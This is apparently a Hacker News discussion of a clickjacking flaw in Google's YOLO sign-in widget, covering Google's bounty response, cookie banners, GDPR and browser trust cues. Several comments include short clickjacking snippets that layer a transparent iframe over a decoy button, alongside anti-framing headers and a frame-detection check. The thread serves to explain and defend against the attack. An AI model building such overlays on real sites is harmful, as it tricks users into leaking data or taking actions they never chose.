Google YOLO clickjacking (innerht.ml)
1304 points by bobross 5 months ago | 229 comments

Google cache: https://webcache.googleusercontent.com/search?q=cache:kv9fSs...

> Exploiting Clickjacking on Google YOLO allows visitors' name, profile picture and email address to be leaked. That's right, I can even know your email address. :) Click here if you want to see behind the scene (make sure you are logged in to Google with a modern browser, PC preferably).

Google's reply to a VRP submission:

> Thanks for your bug report and research to keep our users secure! We've investigated your submission and made the decision not to track it as a security bug.

> The login widget has to be frameable for it to work. I'm not sure how we could fix this to prevent this problem, but thanks for the report!

That's why we don't trust login widgets, right?

Damn, the amount of user trust they just burned by closing that with "as designed, won't fix" is staggering.

Yeah, I read through the post and (assuming I'm parsing it right) can't figure out why this hasn't caused a massive shitstorm already. Are they actually arguing that it's not a security bug because it's necessary for them to implement a 'one click sign in through Google' feature?

Likejacking Facebook likes has been around for 8+ years, leaks a similar amount of information, and there's no big shitstorm. Not sure what the big difference between YOLO and FB's like button is.

I was wondering whether this is actually the same as likejacking. Is the 'leak' in that case the ability for the Facebook page/post owner to then look you up in the list of 'likes'? If so, I think Facebook privacy settings may allow users to not leak their emails or pictures in this case.

Also, I think it’s more widespread given that ‘Google identity’ covers a large number of Google products, and signing into one signs into all. With Facebook any time I log in nowadays I open incognito, check messages, log out, whereas with Google I generally stay logged in, mostly because I want gmail and my cross device browsing history to work.

Do you get the user's email from FB's like button? (edit: typo)

To me Likejacking is more like harvesting organic likes. And YOLO leaks email address which is PII.

Basically, yes.

That's insane.

Yet they silently blocked his website from using this API, thus acknowledging that it's actually an issue.

Shoot the messenger. SOP.

Maybe someone should tip off Google Project Zero about this? Let's see if they mean it when they say they hold themselves to the same standard.

Looks like they took it down for everyone [0]; maybe not the most elegant approach, but at least it seems they're taking it more seriously now.

[0]: https://stackoverflow.com/questions/50289065/google-yolo-sto...

It would be very interesting to see an exact, split-second timeline of this.

Indeed. A Google engineer stated on Twitter [0] that the shutdown of the service happened because apparently YOLO is only supposed to be accessible to whitelisted partners.

[0]: https://twitter.com/sirdarckcat/status/994867632355577862

So, whitelisted partners get the ability to rip your data?

I'm sure that will go down just fine. FB just got into a lot of trouble over something like that (arguably a lot more serious, but still).

They also state in the same Twitter thread that they were aware of the issue before the blog post was written. IANAL but even if the shutdown was intentional (as opposed to being the example of terrible damage control it looks like), willfully leaving a bug in production that allows a set of whitelisted partners to deanonymize their visitors without their consent seems like something that shouldn't fly in countries with data protection laws?

I just received a message back on Twitter saying that the whitelist wasn't the fix and they are still making more changes.

This is seriously denting my continued belief in Google's security chops. I know they have some of the finest security researchers on the planet but this was handled in a ham-fisted and ineffective way so far.

And best of all: without 'partner' status you won't be able to check if it has been fixed.

>This is seriously denting my continued belief in Google's security chops. I know they have some of the finest security researchers on the planet but this was handled in a ham-fisted and ineffective way so far.

This is a great demonstration of how a company can have all of the right talent but still manage to become incompetent through poor organizational policies.

Let's hope it doesn't happen again.

It would be fine if they only gave whitelist access to people who could already simply access your data by request. But the GDPR would only require that they know who could access it, and that the access list be smaller than "the entire world".

Just wait a couple of weeks until GDPR takes effect

Sounds like a fix.

By the terms of the VRP it sounds like the reporter is owed a payout.

Bounty deserved, yes. Fixed? No: they only blocked his address; anyone else can still grab your info on their sites.

Looks like it's blocked for everyone now

It's blocked for people who aren't on the whitelist.

That is interesting, do you have more info? I'd imagine the whitelist being quite enormous!

I don't have any information besides what I've seen posted in the comments here. For example this: https://twitter.com/sirdarckcat/status/994867632355577862

Exactly. If it was supposed to be "just whitelisted partners", he discovered it was actually "everybody". It's no different from discovering that, instead of the password, an empty string is enough.

Well, that did protect users from his site, at least :)

They're burning developers' and potential employees' trust in the first place. This "we don't know how to fix it ==> not a bug" attitude is what's staggering.

To me it shows a gross indifference to being dishonest even when speaking in an official capacity.

I want to say that I hope this is isolated and not a systemic part of their company culture but at this point I can't help but be cynical after this.

This keeps happening over and over again. I remarked the other day that the most feared words when reporting a serious bug are 'won't fix'. It is super annoying. If the feature can't be made to work safely then drop the feature.

> Remember the cookie consent button you clicked at the very beginning? That's right, it was a Clickjacking attempt :)

Brutal. I've gone 100% autopilot on "cookie consent buttons". I'm curious how many other people have. That's a very clever place to clickjack.
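The trick being discussed is the textbook clickjacking layout: an invisible iframe stacked directly on top of a decoy button. A minimal sketch of that generic technique (the URL, sizes, and offsets here are made up for illustration; this is not the actual exploit):

```javascript
// Builds a toy "attack page": a visible decoy button with a fully
// transparent iframe positioned over it. A visitor who clicks the
// "consent" button actually clicks inside the framed widget.
function buildDecoyPage(widgetUrl) {
  return [
    '<button style="position:absolute;top:20px;left:20px;">I agree to cookies</button>',
    `<iframe src="${widgetUrl}" style="position:absolute;top:0;left:0;` +
      'width:220px;height:80px;opacity:0;z-index:10;"></iframe>',
  ].join('\n');
}
```

The essential ingredients are `opacity:0` (the frame is invisible but still receives clicks) and a `z-index` that stacks it above the decoy, which is exactly why frameability of a login widget is dangerous.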

Anything that users get conditioned to because of repeated appearance has this potential, and has been warned against.

What should really bother you is that the intended effect of the legislation was to get websites to stop tracking everything and everybody, not to put up these stupid cookiewalls, and yet this was the result.

Self-regulation didn't work, then there was a soft push, which resulted in a lot of wriggling to get around the law's intent, and now we will see the hard push.

I wonder how many parties will have the guts to try to wiggle out of the hard push, and I'm quietly hoping for one of the larger offenders to be hit so hard they have to shut down, which might send a useful message to the rest.

Analytics is fine, but this wholesale profile building really crosses the line.

What really bothers me is that the law's original design got hamstrung when governments realized it would subvert their own site analytics, and we ended up with the quite-empty-but-mandatory dialog informing users that a site does a thing that is pretty fundamental web technology (not quite as fundamental as "transmits data using the HTTP protocol", but pretty close), instead of scrubbing the whole initiative or replacing it with a Europe-wide education initiative ("The EU presents: browsing and you").

Maybe regulation would work better if there weren't such a disconnect between what lawmakers think people want and the way the technology works.

> got hamstrung when governments realized it would subvert their own site analytics

That's a pretty strong claim. Citation needed.


I always thought it was a combination of slow legislative process, legislators not understanding tech, and industry pushback. I somehow doubt underfunded government IT departments had that much pull.

Those cookie disclaimers are one of the most retarded things on the web.

IIRC the EU mandated that behavior.

Edit: More info: http://ec.europa.eu/ipg/basics/legal/cookies/index_en.htm

Cookie disclaimers at this point need to be taken to their logical conclusion: browser vendors and site operators should add a standard Yes-I-Know-What-Cookies-Are header to the next HTTP update, which can then be vomited at sites by default browser configuration to let them know it's okay to auto-hide the banner.

Hell, let's repurpose Do Not Track for it; it's not like it's being used for anything meaningful otherwise.

Does anyone honor Do Not Track requests?

I feel like honoring Do Not Track is like honoring deadbolts on wooden doors. Most people honor it, but you're not using it to keep those people out...

I expect that the reason why most people honor the first is the high likelihood of getting caught or seen. This deterrent does not exist for web tracking.

I think it's more likely that most tracking companies ignore do not track.

We do (at https://prodlytic.com) - if a client sends Do Not Track, we treat every session as a new user, i.e. we don't track that user across sessions.
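Honoring DNT server-side really is this simple, which makes the lack of adoption all the more telling. A minimal sketch of the kind of policy check described above (the function and its policy are invented; only the `DNT: 1` request header itself is standard):

```javascript
// Decide whether to set a cross-session tracking identifier based on the
// DNT request header. Browsers with "Do Not Track" enabled send `DNT: 1`
// on every request; treating such clients as a fresh user each session
// is one way to honor it.
function shouldTrackAcrossSessions(headers) {
  return headers['dnt'] !== '1';
}
```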

The DNT header reminds me of evil bit RFC [0]. It was funny back then, but times change I guess.

[0] https://www.ietf.org/rfc/rfc3514.txt

Adafruit does. They put their YouTube videos behind a click if you send a “Do Not Track” header.

Is anyone required to honor DNT requests? What happens if they don't?

It's totally voluntary.

That was my understanding as well. I was not sure if perhaps recent legislation in the E.U. may have added any verbiage around that.

The GDPR rather makes it obsolete, actually. DNT was meant as a general purpose opt-out, whereas the GDPR requires an explicit opt-in for most things.

And well, DNT could have had legal bearing, since most legislation in the world requires you to stop tracking when the user tells you to.

So, if the user goes and sets up this general purpose opt-out, you'd have to have some sort of argument why you're different than what the user had in mind when they turned DNT on.

It could have had that legal bearing. Microsoft, as well as Google and Facebook, killed it off pretty thoroughly.

Microsoft killed it by turning it on by default in Internet Explorer, meaning that there were now lots of instances where the user had not explicitly gone into the settings to turn it on (nor performed some other action that serves as a reasonable sign that this is what they'd want, like going into InPrivate Browsing or specifically installing a privacy-focused browser/operating system).

Google and Facebook killed it off by saying right away that they would not respect it. Given how many webpages bundle a Facebook Like button or a Google service (Analytics, ads, GStatic, ajax.googleapis.com, jQuery, fonts, ReCaptcha, Maps, YouTube, etc.), that decision covered most of the web.

As such, there were very few webpages left that could have chosen to respect it and no judge would have just ruled that everyone has to respect it. It would have killed the internet for a few months.

Same here. And it's so annoying that I'm scared of resetting my Android phone just so that I don't have to hit cookie consent everywhere...

Anyway, now with GDPR consent buttons on their way (at least in Europe), there's a fresh new opportunity for black hats to clickjack their whole population of visitors all over again.

Install the "I don't care about cookies" extension; problem solved.

(Firefox for Android supports extensions, I don't know if there are any Webkit-based browsers that do.)

"Annoyances" type adblock lists work too.

The irony of a user having their privacy violated by a pop-up meant to protect their privacy is infuriating.

I just immediately hit those 'cookie consent buttons/boxes' with a uBlock Origin 'block element'. Gets rid of them permanently, and doesn't require submitting/clicking anything.

Bear in mind that most sites use that box only to make you acknowledge that they are tracking you.

I wonder how that applies legally if they happen to collect data on you and you haven’t given consent.

Am I missing something? I don't see anything in the Network panel of my debugging console when I click the cookie consent button.

Google banned him from using their API (instead of fixing the issue). It worked when he posted it, it doesn't work now.

Why would you ever click one of those buttons?

They hover over and cover half of the screen on mobile.

Not clicking it doesn't stop them from using cookies/tracking you. The box is simply to inform you that they ARE doing it, whether you like it or not.

How is that consent?

Once you are informed you can leave the site if you want to.

Except that cookies are already transmitted to the client device, in far too many cases, before the disclaimer is displayed. Also, I'm not sure blanket agreement to all (tracking) cookies will be in accordance with the GDPR.

The implication is that, now that you know that cookies are used for tracking, remaining on the site is implied consent. Like the omnipresent "this call may be recorded" statement at call centers.

It is an instance of a much broader issue, where contracts are no longer the result of any negotiation, but are a take it or leave it option.

I understand going after each and every website would be impractical, but IMO a disclaimer with a button, most probably shown after the site has already transmitted a handful of cookies, does not comply with the spirit of the regulation [1].

[1] https://www.cookielaw.org/the-cookie-law/

Most people have at least a passing desire for cleanliness and order (the stuff that becomes OCD when out of balance) which compels them to get rid of the banner.

Because that's how you make them go away.

To generalize, it's not easy to judge what pixels on a browser's rendered webpage are trustworthy and legitimate.

For example, every time I see a "Are you sure you want to leave this page?"[1], I hesitate for a moment and wonder if that dialog box is being spoofed. That dialog shows up for many scammy websites but also legitimate ones too. Yes, one could try to learn which dialogs can't be spoofed[2] but there's always paranoia because you can't keep up-to-date with all unknown future exploits.

Chrome makes that dialog box scarier because it is modal and you can't click outside of the box on the browser tab's [x] to close the window. (You also can't use the keyboard shortcut Ctrl+F4 to close it.) In contrast, Firefox lets you avoid the dialog box by clicking the tab's [x] or pressing Ctrl+F4.

It's easy to replicate these differences in behavior on website regex101.com.[3] Type a few characters there and then try to navigate away from the page. Chrome forces you to interact with the dialog box but Firefox lets you click [x] on the browser tab.

It's nearly impossible for any combination of CSS and Javascript to "escape" the browser window and hijack the [x] button on the browser's tab so it feels "safer" just to click there.

[1] https://www.google.com/search?q=google+chrome+%22are+you+sur...

[2] https://superuser.com/questions/639084/malicious-confirm-nav...

[3] https://regex101.com/

FWIW, every time a browser pops up a modal that I find suspicious, I use a task manager or an OS shell to kill the process. If I have lost faith in anything a program has rendered to the screen, I no longer trust any of the program's own ways -- including the topmost 'x' -- of making the modal cleanly go away without triggering an action I didn't want to approve of.

The essay 'The Line of Death' [1] talks about users' trust placed into UI elements, and the implications thereof.

[1] https://textslashplain.com/2017/01/14/the-line-of-death/

I think Safari has actually made some good improvements here. It now renders all JS-initiated alerts fully within the page's frame, with different chrome and a different UI than what's used elsewhere in the system.

Perhaps there should be a symbol for "trustworthy", that you can't render on a browser. (The browser would detect it and censor it, e.g. by blackening it out). But the browser itself can use it, e.g. in dialog boxes.

>Perhaps there should be a symbol for "trustworthy", that you can't render on a browser.

To expand on this, the web browsers are missing:

1) trusted pixels: Some bank websites implement this idea when you try to sign in. When you enter your id, you are shown a special secret image that you chose when you created the account. If that image isn't there, you should not trust the password field presented. Therefore, any criminal who wants to present a fake bank login screen also has to know the secret image as well. E.g. Chrome could use this technique to show the secret image with dialog boxes truly triggered by Chrome itself instead of painted by malicious HTML.

2) a trusted keyboard sequence that is well-known and standard: the Windows operating system has this with Ctrl+Alt+Del. Instead of trusting any login screen, you just press Ctrl+Alt+Del, because no user-mode program can hijack that special key sequence; intercepting it requires a kernel patch or a registry hack. A similar idea could be used in browsers to toggle a special keyboard mode that disables all JavaScript keyboard events. This mode could be useful for password fields, or as a special key sequence to "unstack" hidden buttons, etc.

> any criminal who wants to present a fake bank login screen also has to know the secret image as well

This mechanism is theatre:

1. User enters ID into fake bank website.

2. Fake bank website enters said ID into real bank website.

3. Real bank website shows fake bank website your "secret" image.

4. Fake bank website shows you your "secret image".

>3. Real bank website shows fake bank website your "secret" image.

I had left out some implementation details for brevity. Any first time use of a "new" computer to access the online account requires verification from the bank. (E.g. random code is emailed.) At that point, a bank cookie is set. The bank doesn't show the secret image unless the computer already has a cookie from a previous verification.

A fake webpage that tries to forward credentials to a "robo" browser on a computer in Russia wouldn't have that cookie so they'd never be able to see the secret image.

There are probably other security checks the banks do such as ip blacklists etc.

The secret image isn't foolproof but it's an extra signal to signify trust. Likewise, 2-factor authentication with mobile phones isn't foolproof either and can also be hacked.
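The device-cookie gating described above can be sketched roughly like this (all names, the cookie store, and the image path are invented for illustration; a real bank would also layer on IP checks and out-of-band verification):

```javascript
// Only reveal the secret image to devices that completed a prior
// out-of-band verification (e.g. an emailed code) and received a
// device cookie. Unknown devices get nothing, so a phishing proxy
// without the cookie can never learn the image.
function secretImageFor(userId, deviceCookie, verifiedDevices) {
  const known = verifiedDevices[userId] || [];
  if (!known.includes(deviceCookie)) {
    return null; // unverified device: fall back to re-verification
  }
  return `/images/secret/${userId}.png`; // hypothetical path
}
```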

What if they open the bank website in a hidden iframe on the malicious site?

X-Frame-Options: DENY
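Concretely, a sketch of the response headers a bank (or any site that should never be framed) can send; `X-Frame-Options` is the legacy header, and CSP's `frame-ancestors` directive is its modern successor:

```javascript
// Anti-framing response headers. Sending both covers old and new
// browsers; `frame-ancestors 'none'` is the CSP equivalent of DENY.
function antiFramingHeaders() {
  return {
    'X-Frame-Options': 'DENY',
    'Content-Security-Policy': "frame-ancestors 'none'",
  };
}
```

The irony in this thread, of course, is that the YOLO widget cannot use these headers: it has to be frameable to work at all.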

Someone tried defeating the secret-image security... it turns out all it takes is a static image saying "Error with Secret Image Server, call us if the problem lasts more than 24 hours."

Banks should notice a new IP/browser and then force two-factor authentication before showing the image, e.g. by sending a text. That would make users far more suspicious, as rather than a normal login they'd see one of those "we don't recognize your browser" screens. The bank can also track the third-party connection to their servers, making this trickier to get away with. So while not foolproof, done correctly it is actually very useful.

However, a website would not have access to the browser's image unless the machine was already compromised.

Hm... the way I remember this feature (forgot where it was) is that your custom image is stored in your browser (localstorage?), not on the remote site. So when you see your image, you know it's the same origin. (E.g. not a similar URL with two letters swapped, I guess.)

That's not an issue though if we're talking about the browser UI, as there's no way for a website (malicious or otherwise) to obtain secret image data from the browser.

That secret image thing... Can't the fake site easily proxy your chosen image from the real site the moment you submit your username to the fake site?

Sorry for not being clear. For the Chrome implementation of the secret image, I was thinking that the user would store it locally inside of Google Chrome configuration. E.g. in "chrome://settings" or "chrome://flags", the user sets the secret image (e.g. a photo of their cat or whatever.)

Oops, I was the one being unclear. I was just going off on a tangent about the HTML ones that some banks use. A native one indeed wouldn't have the problem I'm mentioning.

There kinda is. It's the line of death: https://textslashplain.com/2017/01/14/the-line-of-death/ (But, as the article points out, even that isn't perfect.)

True. Like the other commenter noted, perhaps we could use a special key-combination (or perhaps a new key even) to enter a secure mode. Pressing that key-combination could trigger the area above the line-of-death to increase in size. Then it could show more security-related information, and perhaps even password entry fields. Just brainstorming here.

I think that'll end up backfiring by making a single target a lot of people will aim to break, creating an arms race that the browser will lose on occasion, to the great detriment of its users.

I think the issue you're describing has been fixed for years in Chrome. (The SuperUser question is from 2013.) Websites no longer have full control over the content of the dialog box, they do not control the button labels ("leave page"), and they are (I believe) prevented from adding so much text that the button runs off the screen.

The fact that the dialog box is modal proves that it's not spoofed.

> has been fixed for years in Chrome.

Right, it was fixed (past tense), but that doesn't change the cognitive burden for tomorrow's unknown exploits that look very similar (future tense). Every time a popup shows up on screen, I have to ask myself, "am I up-to-date on the latest browser engine internals to safely click this UI element?"

>The fact that the dialog box is modal proves that it's not spoofed.

Right but... this creates a very convoluted "decision tree" in the web surfer's brain to know whether dialog boxes are real and trustworthy. E.g. if I want to instruct my grandmother to only click on the trustworthy "Leave this Page" buttons, I have to tell her to click outside the box and if she hears a beep while at the same time nothing happens, (the layman's determination for the computer geek's jargon of "modal"), she can then safely click that button. Otherwise that "Leave this Page" button could be a fake and it downloads malware on her computer. Those are very nuanced and error-prone step-by-step instructions for safe web surfing.

Instead of that, using the spatial rules of clicking on the browser tab (the "line of death", as others pointed out) is a much easier guideline to follow.

> I hesitate for a moment

Does pressing Escape also allow "keypress-jacking"?

> Shortly after this article was published, Google silently prevented my domain from using the API:

> The client origin is not permitted to use this API.

> Welp.

So some buttons stopped working, and now you have to believe that everything was as the blog said. Well, it was.

And a "mitigation" from google being just avoiding the access to the API just makes things more interesting.

I know I'm just one person - but I can confirm the content of the blog was accurate and the described attacks did work at the time I read it.

This is what you would see if it still worked:


Quite a sketchy move from Google... Hope OP will eventually get a big bounty paid out.

> Google

Big companies trying to put a stranglehold on the small ones -- nothing new, time to move on. It's pathetic.

API ban was probably automatic due to HN effect.

Actually, Google seems to have temporarily shut down the service; I've tried changing API keys/domains but received the same error.

A lot of Google employees read HN and actively post, so no surprise. Did they at least contact you to properly open a ticket, now that they've implicitly recognized the vulnerability? Otherwise it's a very, very dickish move, as it solves nothing and you basically worked for free...


And now, if anybody from the HN team is listening: can you explain why this thread is slipping off the front page so fast?

Currently it's being overtaken by articles that are older, with fewer upvotes and fewer comments. Can you guarantee that nobody is able to manipulate the ranking? It's only a hunch, but it's not the first time I've noticed that Google-related "bad buzz" moves off the main page slightly faster than other stories...

PS: I’ll gladly accept downvotes. But answers on why I’m wrong or paranoid would have been better

There appear to be quite a few flags on the article pushing it down. The ratio of upvotes to age compared to the rest of the front page is a strong indicator of this.

Also: lots of HN'ers work at google. It would be a nice rule if people were told to abstain from using their flagging privileges when the company they work at is the subject of a thread.

Thanks a lot for investigating. Otherwise I couldn't have ruled out that it was just me being paranoid about this.

It looks like the situation has mostly corrected itself by now.

Power corrupts. Absolute power corrupts absolutely. Absolute power hates when it is challenged in any shape or form

It's probably because a lot of Google folks are on here, protecting their brand. Unfortunately that part isn't transparent, but it's hopefully a minor issue.

HN has moderation, so some stories can be pushed back into the /new stack by staff; they can fall again if they aren't liked by the community.

Although I don't think this is some sort of conspiracy, HN front-page is curated content, ranking is not only based on votes.

Flags are a factor, and function as downvotes on articles but are much heavier weighted than upvotes.

How do I hack into Google? I'm a kid and I want to make it say gibberish instead of Google.

does anyone know?

That doesn't sound plausible; what sort of service would YOLO be if a popular website using it resulted in an API ban?

This is a really well written article.

I recall a video talking explicitly about this problem - it was something about using the browser paint API in conjunction with iframes for security? The gist was a browser should be able to tell in real time if an iframe is visible and should be able to block user input depending on whether or not the site was hiding the iframe, putting something on top of it, pushing it off screen, moving it around, etc...

But I can't remember the source. If I can find it, I'll add it in an edit. And of course if anyone else knows the talk I'm thinking of, please link.

NoScript includes protection against this! He calls it ClearClick:

" whenever you click or otherwise interact, through your mouse or your keyboard, with an embedded element which is partially obstructed, transparent or otherwise disguised, NoScript prevents the interaction from completing and reveals you the real thing in "clear". At that point you can evaluate if the click target was actually the intended one, and decide if keeping it locked or unlock it for free interaction."


Yes it is. My goodness, this is one of the best things about HN.

Yep, very good.

It certainly makes me glad I did _this_ on my FB account:

>> You previously turned off platform apps, websites and plug-ins. To use this feature, you need to turn them back on, which also resets your Apps others use settings to their default settings. <<

.. but further to that, I should take my FB login and stick it in a Firefox container where it belongs.

> This report will unfortunately not be accepted for our VRP. Only first reports of technical security vulnerabilities that substantially affect the confidentiality or integrity of our users' data are in scope, and we feel the issue you mentioned does not meet that bar :(

Do the right thing Google.

Or maybe that simply means this is not the FIRST report of a technical security vulnerability that substantially affects the confidentiality or integrity of their users' data.

Which is in a way even worse :(

Yeah, now they've blocked the OP's webpage, according to an update on the blog. So the demo doesn't work, but the attack will still work from any other malicious page.

To fix this, there could be a new `X-Frame-Options` value: `compose-over`. The browser would compose the frame separately and always place it on top of the rendering context, above every other element, regardless of the host page element's z-index, opacity, or whatever.

It's kind of like how an app cannot draw over system UI; like the permissions dialog.

I'm surprised this is not how X-Frame-Options worked in the first place.

Or maybe logging in ought to be handled directly by the browser, in a way that couldn't be hijacked or phished easily. Do we really need a million different implementations of a login form?

UAF/U2F, which conveniently is part of the new webauthn standard that just got released in the latest Firefox update

And make sure it has a minimum size so we don't get a 1px iframe following the cursor.

That's something the iframe can detect itself though through JS :)

But as pointed out in the article, the JS method of detecting whether your page was embedded is a bit unreliable.
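For reference, the classic page-side check, written here against an injected `win` object so it can be exercised outside a browser (in a page you would pass `window`). As noted, an embedding page can often defeat checks like this, e.g. the iframe `sandbox` attribute can disable the frame's scripts entirely, which is why header-based protection is preferred.

```javascript
// Framed-or-not detection: in a top-level page, window.self === window.top;
// inside an iframe they differ. A cross-origin top can make the property
// access throw, in which case we assume we are framed.
function isFramed(win) {
  try {
    return win.self !== win.top;
  } catch (e) {
    return true;
  }
}
```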

Why rely on a million different copy pasted implementations if one good implementation is possible?

I'm looking forward to Google giving out a $100 reward or even nothing to the researcher.

Like they did to the guy who found the sitemap ranking bug in Google Search, where he was able to let others pay for a first-page ranking. He only got $1,337, and it took Google 6 months to fix it.

That was me. Google later upgraded the bounty to $5000. :)

Article for those interested: http://www.tomanthony.co.uk/blog/google-xml-sitemap-auth-byp...

There should be another website where people bid on the bug. If Google cares enough about it, they'll out bid the people that want to exploit it.

Lol. A market for vulnerabilities? Pretty sure these exist already. ;)

This is a pretty clever idea. :) cuz you know Google makes money from ad bidding.

...and ought to store the current bids as search results on Google.

> Now, I'm presenting you another button. It doesn't have much to say except "harmless", and I challenge you to click it.

In an article like this I can't help but think that the "[ ] Behind the scene" button is the real bait.

The irony here is that the ridiculous "agree to cookies" requirement makes the users ever so slightly less safe. (Thanks, regulators.)

All those reminders do is remind me how stupid the regulators are.

I use this to close them; https://news.ycombinator.com/item?id=16575304

They might be stupid but almost every website is even more stupid. Almost none offers a way out of spying.

FWIW, setting privacy.firstparty.isolate to 'true' in Firefox prevents this from working.

I believe site isolation in Chrome also does this


I don't think so. Chrome's site isolation just isolates different origins in different browser processes, whereas Firefox's first party isolation is intended to isolate _cookies_.

Interesting discovery: The facebook-like clickjacking doesn't work on Firefox when I have Facebook in its own tab-container (even though I'm logged in, just in that container, not the one I clicked on).

I'm not sure what the minimal repro is here, but if it's the containerization working as intended, that'd be awesome.

This is the intended effect! And if you use the dedicated Facebook Container it's even stronger. The Like button will be blocked entirely, so even Facebook won't receive the "Like" action. https://addons.mozilla.org/en-US/firefox/addon/facebook-cont...

> As for the reason this was closed as working as intended, it was just done accidentally, we had already an internal bug tracking clickjacking in YOLO. Sorry for the confusion!


Somehow this was already known internally, the blog (innerht.ml) gained some traction, and then action was taken. It seems some miscommunication occurred inside Google, and this problem attracted much more attention than was necessary.

According to an update on the OP post Google apparently now silently blocked the OP webpage, so the exploit doesn't work in this case - but will still work for any other malicious page. Not cool Google.

I've learnt my lesson.

In future I will dismiss cookie consent buttons by deleting their DOM node from the inspector.

Addendum: Google logged me out of some services and I had to re-login with 2FA. It seems that Google is doing something about this, but what exactly?

Sounds like an "oh shit" "self-destruct" button just to cover their asses while they figure it out.

Nope, I think it's more likely some AI thing that got triggered.

Happened to me too

This would be a nice adblock list.

Considering cookie consent buttons will be gone in two weeks, I don't think that's gonna be of much value.

EDIT: Please research the GDPR and new ePrivacy regulation before you vote.

I won't vote either way, but I will say that regardless of what GDPR may mean, "you need a cookie warning" will be accepted web dev mantra for years, and the things they build in that time will be around longer still.

The "you need a cookie warning" attitude is the reason why the GDPR is actually so strict, though.

The goal was to let users opt out of tracking in the hope that the industry would self-regulate.

Now that it hasn't, GDPR is coming down hard.

Web devs really manage to fuck everything up.


You mentioning "log in" in this context makes it pretty clear you're also fairly ignorant about the specific topic. Log ins, shopping baskets, ... do not require a cookie notice.

Not only is what you're saying irrelevant to my point, you're wrong. "Log ins, shopping baskets" do require a notice if they are persistent, which almost all of them are. Looks like you're the ignorant one here.

I bet you they'll still be around in a decade :)

They may be, but they'll be useless then. They're not considered consent anymore under the new regulations.

Being useless is just one more reason to adblock them.

another neat method for closing them;


Fanboy's cookiemonster list seems to be updated more frequently: https://github.com/ryanbr/fanboy-adblock/blob/master/fanboy-...

For me Google One Tap stopped working on all my sites where it previously worked. I added an HTTP referrer restriction to the API in console.developers.google.com, but I still get the warning message "The client origin is not permitted to use this API." Any thoughts? If you go to https://www.wego.com/ you can see that Google One Tap still works...

On Twitter [0] they're claiming that it wasn't disabled, and that it working only on a set list of hosts is intended behavior.

[0]: https://twitter.com/sirdarckcat/status/994867137704587264

Exactly the same thing here. I use it to secure my admin account and got "The client origin is not permitted to use this API.", and like you, my domain is correctly allowed in console.developers.google.com.

I guess they didn't even patch it; they just ninja-blocked everything until they have something better. It's stupid, since they had the information beforehand and could have prepared. It proves again that full disclosure is useful.

It is working on pinterest.com also

Same here at Aibono, all our systems depend solely on YOLO.

If even Google can't get basic clickjacking protection right, I really see no hope for the Web as it is. Is there a FF plugin to block all forms of non-first-party content (including but not limited to iframes) and also to switch off "dubious" use of CSS?

Look into uMatrix - it's a damn good plugin for this purpose. But you might need to find something else to control CSS loading.

NoScript Classic has/had clickjacking mitigation. I don't know if the updated version post-Quantum was able to retain this.

Is there any particular reason why js wouldn't be used to emulate the same effect? I'm thinking that the onclick() method calling several things instead of just whatever the button is intended to do.

Please do ignore if i completely misunderstand the discovery, but i don't really see the need to make a html+css button to make any of this execute.

The same origin policy prevents JS from triggering clicks on elements in iframes that have different origins! The web would be a very insecure place without that... =)
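Roughly what the policy blocks, as a sketch (the widget URL here is a placeholder):

```html
<!-- A parent page cannot reach into a cross-origin frame and click things: -->
<iframe id="widget" src="https://accounts.example.com/signin-widget"></iframe>
<script>
  const frame = document.getElementById('widget');
  frame.onload = () => {
    try {
      // Throws a SecurityError because the frame is cross-origin:
      frame.contentDocument.querySelector('button').click();
    } catch (e) {
      console.log('blocked by the same-origin policy:', e.name);
    }
  };
</script>
```

Which is exactly why clickjacking doesn't script the frame at all; it just positions the real, invisible frame under the victim's cursor.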

Ah, I see. Very good point, thank you!

I too reported a similar issue very recently to VRP and got the exact same response, except in the end there was a line

"If you think we've misunderstood or can provide a convincing attack vector, please do let us know!"

I think OP did not post this line in the blog, which makes Google look like they don't care at all.

No, it was the full email. Besides, I've tried to suggest a fix by prompting first time users but it's been ignored for a week.

Just a thought: why not add a play button to iframes as well, just like the one for videos that prevents autoplay?

You could still convince users to do a double click, no?

Honestly a decent sized chunk of users that I support double click most things anyway.

A large chunk of the user base doesn't know the functional difference between icons, hyperlinks and buttons.

Given that a large chunk of the web creator base seem to use these interchangeably nowadays, the confusion is unsurprising.

Unfortunately that is true, and it's really bad for accessibility too (using links as buttons, but not coding the keyboard events that are used on buttons, for example).

Well, yes; you double-click the play button to play the video/iframe. I'd be more worried about "Oh, the button did nothing, I should try again.". The real fix is to not allow transparency/compositing.

My dad double-clicks everything. So yeah, it's super easy.

Conveniently I had ignored the cookies button because it was not impacting the article text.

I saw it, immediately thought "this is clearly part of the demo", and clicked it, because I was certain it was going to be fun. Woe betide me and my poor risk valuation skills - but not today.

I use clickjacking as a “feature” on a website I operate, http://vlograd.io

I had no choice, at least on mobile.

On mobile browsers, audio contexts start out as muted. They can only be unmuted by an event originating from user interaction.

I use a web player embedded in an iframe on my site. It has an API to communicate with it to do things like playing and pausing the current track. However, this also means the audio context is in a cross-domain iframe, and my only way to trigger the play() method is via the asynchronous postMessage API it exposes. So, in order to unlock the audio context, I present mobile users with a “tap to start” screen. In reality, I’ve positioned and zoomed in on the iframe such that the play button is covering the entire screen for any reasonable screen size. Thus, when the user taps to start, the audio context is unlocked (since the “tap” event on the play button in the iframe fires), and I immediately send a “pause” command via the player’s API. Now, the audio context is unmuted and I’m free to send the “play” command for any track to start playing music.
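A rough sketch of the trick described above. The player origin and the postMessage format here are invented; every embedded player has its own protocol:

```html
<!-- The iframe is positioned and zoomed so its play button fills the screen. -->
<iframe id="player" src="https://player.example.com/embed"
        style="position:fixed; top:0; left:0; width:100%; height:100%; border:0;">
</iframe>
<script>
  const target = 'https://player.example.com';
  const player = document.getElementById('player').contentWindow;
  window.addEventListener('message', (e) => {
    if (e.origin !== target) return;
    // The user's tap landed on the oversized play button and unlocked the
    // audio context; immediately pause so playback is under our control.
    if (e.data && e.data.event === 'play') {
      player.postMessage({ method: 'pause' }, target);
    }
  });
</script>
```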

Anyone else too trusting in clicking the buttons? Brilliant idea to demonstrate the issue with a like to his own blog post!

The "behind the scene" checkbox was one of the coolest depictions for a web page describing click-jacking.

A quite common misunderstanding about clickjacking is the idea that third-party content embedded in an iframe can hijack clicks on the parent (your) website. While embedding an untrusted iframe in your website is not a good idea, the clickjacking attack goes the other way around.
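For anyone who hasn't seen it, the classic shape of the attack is roughly this (the victim URL is made up): the attacker's page stacks an invisible iframe of the target site on top of a decoy button.

```html
<!-- attacker page -->
<button style="position:absolute; top:100px; left:100px;">
  Totally harmless button
</button>
<iframe src="https://victim.example.com/one-click-action"
        style="position:absolute; top:0; left:0;
               width:500px; height:300px; border:0;
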